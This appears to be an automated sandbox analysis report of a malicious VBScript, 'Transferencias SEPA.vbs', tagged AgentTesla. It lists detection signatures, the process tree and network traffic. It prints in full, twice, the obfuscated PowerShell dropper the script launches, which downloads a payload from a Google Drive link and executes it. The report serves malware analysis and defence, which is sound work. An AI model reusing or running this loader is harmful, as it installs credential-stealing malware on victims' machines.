
Windows Analysis Report
Transferencias SEPA.vbs

Overview

General Information

Sample name: Transferencias SEPA.vbs
Analysis ID: 1427936
MD5: 73abc522ed981b48b4be2ba972900b68
SHA1: 986995bde37b8ac4daff9b88e5d9bdf4f6b82d72
SHA256: f0ecd3e8f225833c8b6b7945c99e1f5c8a4ccb3332cfb4b7ab7b63d7d98d88f4
Tags: AgentTesla, vbs

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2700 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? 
T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnudmLappa.Brug.NTallee KafftFersk.teddyW B,chestosnbAffreCtredalknastiDemoke To enCompetBrode ');anthropometry (Toxophilism87 'Be.ol$umaadGGge.de Uar,nTymbaaTha.ln EvejvDelpreCyllonSensodAss seLovbelSidetsNynaze Eksesy,unglSmackoSt.fsvA,tiaeRetian Per.e.inocs Vult. 
svinH,undfeMele.atelemd StraeInterrDissis Bo.e[Diona$Sek.nNGrnsey,eflet PredtFortyeBde insignadBiplae ManasAppro]An iu= .uic$Lexi.GAlfadi Equim.bjecmGeldeeSkr.erR.stalNoaa.aHi,simSpaltsStorh ');$Ampereomraadet=Toxophilism87 'balloGBut oeSideon kibsaMo.ybnresi,vIn faeBrakinKl.kedT ukhe Elevl H,ngsring e m shs Acrolsu,faoBank vSquase BhutnSaniceOk ids Fler.TilgaDSo.anoPaterw taktnebulll solsoB.rina verhd,efleF.ortliOrdgylDiploeAuto (Wo,se$PaataF ris,r PaleaL gderRegasaUnpepaRokk,d o,deeLodssdAsbe.e Po,b,Vi.il$ Hje ERhabdx Gynetserote OverrMeninnSkrubastryklOmlahiNicotsOvervt V ne)freml ';$Ampereomraadet=$liquorish[1]+$Ampereomraadet;$Externalist=$liquorish[0];anthropometry (Toxophilism87 'c.alo$Evelig.croalSwon.oSh,nkbGrensaptakilAccel:ScurfF De ulTop,gySkivgtRentet Udste ,ilid Afv eDmret5B,dtv3Semem=touch(Hyd tTJerseeRetousCarkit,eled- nconPProfoa DiartPreaphIndiv Hane,$ .ydaES.rifxTitretPree,eMagrerFlbedn ManiaEntonl S,ori Bin,sLugsatIs.la)Svirv ');while (!$Flyttede53) {anthropometry (Toxophilism87 'Exter$A.etagUnwillF.skeoRutscbAn.ihaAthyml Aale:StackU ReconValmuiVarmeoeffecnDidnhe ArberSpi tnSireneN,isk=Snarl$G atbtGenlorafgifuUru,ueTalsm ') ;anthropometry $Ampereomraadet;anthropometry (Toxophilism87 'UnconSIsospt.bsciaBank rDemartPara -TowelSAdvoklPaavie VapoeInd,fp Bran agna.4H rbi ');anthropometry (Toxophilism87 'Respo$PseudgO.ervl Jul.oRad.lbHypoma B bulSy.te: FaglFGagerlThen,yBaggrtSailptBun,ee Fro.dTrefae Uful5 jene3 st i=Over,(Un.alTAllegeC,kels Hi rtFagud-Lew,sPFlaucaPseudtAcrobh Drak Chim$Het rE Sti,xSndr tChondeComper AftenHmorra AlerlOpspoiWissfsHorolt O cu)Arbej ') ;anthropometry (Toxophilism87 'Laven$Udskng ,ecolS.bpeo.nforbAf,ada Ba elKvart: KorsROssmie sdumsTer,iiFjerngBort,nPlatte PolarTor,l7preda7Seeds=Speci$Neostg VeralcigaroEpimybOptllaTvrfalHasta: mblaKin.ttFigurl Per a SkrmsKnudde .umbnCerem+,ryll+Nonju%Verni$PlastU indwnAkkomd rgeeUnciar Au,ovma.thgFurunt.egroiCarpog Folkh UnuteH.emod Be,isStilm1Bille3afval4 Ambu.BoudocAgg eo Slufu,rndvn 
CeretUnsal ') ;$Fraraadede=$Undervgtigheds134[$Resigner77];}anthropometry (Toxophilism87 ' Snoo$ Ce.egBannelAffalo,aldybRo.leaN.ngrlKortl:H.nstNQuizeoP.lshnStyr,cTabitoOverpn Su asBecrat.oyalrO,dknuInhalcRoupetPectiiAromeoTofron Yuca Chak=Gen e MonogGTranse bio,tConge-PommeCHjer okashunUncoftSvve,eunangnAu,omtTmrer .kraa$ProsoE PlebxVedhntdanefe.langrGamogn .fbraHid rlRes.piClouesMu.ift Form ');anthropometry (Toxophilism87 'Anlg $unencgommatlSalg oSteelbUnbecaMe,allHelle:AllurDHumpbaskovanServenEthicePlenulDiurnsNotioe Myeln,ekst Pig t=Straf Det.[HuskeS TaagyAr,its rtshtAberre BoffmMedli.GengaCNedsloKomtenKatapvOv.rseSy,osrlli,gtUnmat]Expro:,argi: topmFSagkyrDevouoI.conm NarrB TegnaPy.mysSorroeGaste6Tyl.s4BabyeS Middtko.parFilitiStrimn.ispugHande(Affec$Rep.gNVir.loVet.rnKontocHypheoGribenSpisesG inst N.dkrLirkeu YankcHundetGeosiiForuno Da tnDagsk)L raw ');anthropometry (Toxophilism87 'Vejar$Holocg MicelSma hoHelhebs,miaa,ahool Or.i:Umbe,SMetolaGrubenFejl.sUdspaeValorlHaabeiP,atygAtom hT emoeu,ilad Koks Plagi=Gkke, anma,[ SamfST.uchyTvangsSkar,tGigasePredim.tten.NagysTf.ongeVristxNull.t omot. PengEForsonFixatcErklroLseladFuturiSamlenhypo,g Broc]Mel n: Rhin:Hij cA KiosS Mar C Kva,IHypopIFlids.O rafG Ink.eL.bstt UnroShype.tUdeblrS edpiBortgn Of.egCent (K uli$TaageD JongaFirepn C rinDefiaeTidsbl Igans,dspaeVapsenMedic)Varie ');anthropometry (Toxophilism87 ' sp.g$Goni.g HaralArkimoOverrbBiotoaRoyallOrdre: V tiFMed,cyPausenHyttebC oreo.herme Kis.r Encan IdreeFldeb=patri$Bere,SFoulma sktnKatols Op.ae DemolSo,iviGrnseg .ilphAcroseFrlaadEfter. Un,asGirokuhotmebTeknosKassetPyrenr Ep sist renOsteogParis(Syste3 Bor,0Spati4Thwar9O,ner8 Lang2Doler,pil t2 E.in9 adi3Koinc4 ,nde8Klu.e) Kult ');anthropometry $Fynboerne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4844 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 6536
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
Source: amsi64_6536.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xe360:$b2: ::FromBase64String(
  • 0xd36f:$s1: -join
  • 0x6b1b:$s4: +=
  • 0x6bdd:$s4: +=
  • 0xae04:$s4: +=
  • 0xcf21:$s4: +=
  • 0xd20b:$s4: +=
  • 0xd351:$s4: +=
  • 0xf796:$s4: +=
  • 0xf816:$s4: +=
  • 0xf8dc:$s4: +=
  • 0xf95c:$s4: +=
  • 0xfb32:$s4: +=
  • 0xfbb6:$s4: +=
  • 0xdb5b:$e4: Get-WmiObject
  • 0xdd4a:$e4: Get-Process
  • 0xdda2:$e4: Start-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", ProcessId: 2700, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs", ProcessId: 2700, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? 
T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnudmLappa.Brug.NTallee KafftFersk.teddyW B,chestosnb
No Snort rule has matched


AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: Transferencias SEPA.vbs; ReversingLabs: Detection: 21%
Source: Transferencias SEPA.vbs; Virustotal: Detection: 13%
Source: unknown; HTTPS traffic detected: 173.194.219.101:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1433043987.000002497601B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1434067052.00000249760C1000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: drive.google.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: drive.usercontent.google.com; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; DNS traffic detected: queries for: drive.google.com
Source: wscript.exe, 00000000.00000003.1260166665.0000023CBC336000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1271709936.0000023CBA2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1269652900.0000023CBA2F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274229215.0000023CBA367000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1271709936.0000023CBA2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1269652900.0000023CBA2F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274229215.0000023CBA367000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1275759944.0000023CBC580000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab4-
Source: wscript.exe, 00000000.00000003.1260636781.0000023CBC5AD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e95b4e6024d23
Source: wscript.exe, 00000000.00000003.1260226831.0000023CBC2F2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabFH
Source: wscript.exe, 00000000.00000003.1261281787.0000023CBC5D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260636781.0000023CBC5AD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e95b4e6024
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1384995967.0000024900001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1384995967.00000249018B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/uc?export=download&id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbzaP
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1384995967.000002490048D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1384995967.000002490048D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com/download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download
Source: powershell.exe, 00000002.00000002.1384995967.0000024900227000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1384995967.00000249012E6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.1424642021.00000249101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424642021.0000024910070000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1384995967.0000024901E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1384995967.0000024901DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024900489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.00000249004F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1384995967.0000024901DDB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: unknown; Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49707

System Summary

Source: amsi64_6536.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 6941
